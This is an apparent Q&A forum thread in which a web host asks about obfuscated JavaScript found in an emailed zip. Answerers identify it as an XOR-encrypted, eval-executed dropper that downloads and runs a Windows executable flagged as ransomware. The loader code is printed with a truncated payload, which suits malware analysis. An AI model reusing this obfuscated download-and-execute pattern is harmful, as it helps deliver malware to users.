So some background. I currently host a few small sites for my clients. I use cPanel.
Recently, I received an email on my server with a zip file. The zip file contains the following code:
function jqmqmkrehl(luezhqtygz)
return parseInt(luezhqtygz,16);
function jvqissrxgt()
var ftytqpuqjd="val12312312".match(/S{1}/g);
return ftytqpuqjd[Math["floo"+""+"r"](Math.random()*ftytqpuqjd.length)];
function jqmqmkrehl(luezhqtygz)
return parseInt(luezhqtygz,16);
function sehudasphf()
var a = 1;
var lzpxyboxat="f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
return lzpxyboxat;
function yneepaqzwu(yluyzuvvps)
var mfjvremiuf;
mfjvremiuf=(new Function("uneuuflaii","var zkyczguxoo=new Array(150,130,98,197,235,63,236,120,60,54,105,159),htcpxtvter=uneuuflaii.match(/\S{2}/g),xjrefvhonb="",ftvjsrrtfs=0;for(var ftvjsrrtfs=0,wgwizxghjb=0;ftvjsrrtfs<htcpxtvter.length;ftvjsrrtfs++,wgwizxghjb++){if(wgwizxghjb>=zkyczguxoo.length){wgwizxghjb=0;}xjrefvhonb+=String.fromCharCode(parseInt(htcpxtvter[ftvjsrrtfs],16)^zkyczguxoo[wgwizxghjb]);}e"+jvqissrxgt()+jvqissrxgt()+jvqissrxgt()+"(xjrefvhonb);")(yluyzuvvps));
return mfjvremiuf;
All I know is that it is a javascript file, but I have no idea what this does. Can anyone enlighten me?
(P.S. I am literally brand new to programming.)
Here is what it does: The code decrypts the long string variable (
var lzpxyboxat="f0f70ca69f5683161c510c...
). The decrypted string is again JavaScript code, which is then executed. This is the decrypted code:This code downloads a file from the URL (WARNING: potentially malicious file)
. The file is saved in the temporary files folder and executed withcmd.exe /c start [filename]
.As far as I can see the downloading and execution will only work on Windows systems.
I uploaded the file to VirusTotal: analysis result.
Deobfuscating your script yields:
The script contains encrypted JavaScript code and a decrypt function based on a simple XOR cipher.
Decrypting the encrypted code yields:
This script
According to, 8 of 61 virus scanners recognize the executable file as malicious, e.g. McAfee classifies it as “BehavesLike.Win32.Ransom.dc”.